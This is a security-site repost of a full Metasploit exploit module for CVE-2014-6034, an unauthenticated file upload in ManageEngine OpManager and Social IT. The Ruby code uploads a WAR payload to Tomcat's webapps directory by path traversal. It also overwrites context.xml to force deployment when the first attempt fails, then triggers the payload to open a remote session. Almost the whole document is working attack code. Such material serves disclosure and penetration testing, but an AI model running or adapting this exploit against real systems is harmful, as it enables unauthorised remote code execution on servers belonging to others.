首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ManageEngine OpManager / Social IT Arbitrary File Upload
来源:metasploit.com 作者:Ribeiro 发布时间:2014-10-08  

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'ManageEngine OpManager / Social IT Arbitrary File Upload',
      'Description' => %q{
        This module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.
        The vulnerability exists in the FileCollector servlet which accepts unauthenticated
        file uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on
        version 11.0 of SocialIT for Windows and Linux.
      },
      'Author'       =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2014-6034' ],
          [ 'OSVDB', '112276' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ]
        ],
      'Privileged'  => true,
      'Platform'    => 'java',
      'Arch'        => ARCH_JAVA,
      'Targets'     =>
        [
          [ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 27 2014'))

    register_options(
      [
        Opt::RPORT(80),
        OptInt.new('SLEEP',
          [true, 'Seconds to sleep while we wait for WAR deployment', 15]),
      ], self.class)
  end

  def check
    res = send_request_cgi({
      'uri'    => normalize_uri("/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector"),
      'method' => 'GET'
    })

    # A GET request on this servlet returns "405 Method not allowed"
    if res and res.code == 405
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe
  end


  def upload_war_and_exec(try_again, app_base)
    tomcat_path = '../../../tomcat/'
    servlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector'

    if try_again
      # We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration
      # does not allow us to deploy WARs. Fix that by uploading a new context.xml file.
      # The file we are uploading has the same content apart from privileged="false" and lots of XML comments.
      # After replacing the context.xml file let's upload the WAR again.
      print_status("#{peer} - Replacing Tomcat context file")
      send_request_cgi({
        'uri' => normalize_uri(servlet_path),
        'method' => 'POST',
        'data' => %q{<?xml version='1.0' encoding='utf-8'?><Context privileged="true"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>},
        'ctype' => 'application/xml',
        'vars_get' => {
          'regionID' => tomcat_path + "conf",
          'FILENAME' => "context.xml"
        }
      })
    else
      # We need to create the upload directories before our first attempt to upload the WAR.
      print_status("#{peer} - Creating upload directories")
      bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
      send_request_cgi({
        'uri' => normalize_uri(servlet_path),
        'method' => 'POST',
        'data' => rand_text_alphanumeric(4 + rand(32 - 4)),
        'ctype' => 'application/xml',
        'vars_get' => {
          'regionID' => "",
          'FILENAME' => bogus_file
        }
      })
      register_files_for_cleanup("state/archivedata/zip/" + bogus_file)
    end

    war_payload = payload.encoded_war({ :app_name => app_base }).to_s

    print_status("#{peer} - Uploading WAR file...")
    res = send_request_cgi({
      'uri' => normalize_uri(servlet_path),
      'method' => 'POST',
      'data' => war_payload,
      'ctype' => 'application/octet-stream',
      'vars_get' => {
        'regionID' => tomcat_path + "webapps",
        'FILENAME' => app_base + ".war"
      }
    })

    # The server either returns a 500 error or a 200 OK when the upload is successful.
    if res and (res.code == 500 or res.code == 200)
      print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s +
      " seconds for deployment")
      sleep(datastore['SLEEP'])
    else
      fail_with(Exploit::Failure::Unknown, "#{peer} - WAR upload failed")
    end

    print_status("#{peer} - Executing payload, wait for session...")
    send_request_cgi({
      'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
      'method' => 'GET'
    })
  end


  def exploit
    app_base = rand_text_alphanumeric(4 + rand(32 - 4))

    upload_war_and_exec(false, app_base)
    register_files_for_cleanup("tomcat/webapps/" + "#{app_base}.war")

    sleep_counter = 0
    while not session_created?
      if sleep_counter == datastore['SLEEP']
        print_error("#{peer} - Failed to get a shell, let's try one more time")
        upload_war_and_exec(true, app_base)
        return
      end

      sleep(1)
      sleep_counter += 1
    end
  end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Asx to Mp3 2.7.5 - Stack Overf
·HP Network Node Manager I PMD
·XAMPP 1.8.x Multiple Vulnerabi
·Pure-FTPd External Authenticat
·Ultra Electronics SSL VPN 7.2.
·GNU bash 4.3.11 Environment Va
·TeamSpeak Client 3.0.14 - Buff
·Kolibri Webserver 2.0 Buffer O
·Adobe Flash 14.0.0.145 copyPix
·Apache mod_cgi - Remote Exploi
·Internet Explorer 8 - Fixed Co
·Postfix SMTP - Shellshock Expl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved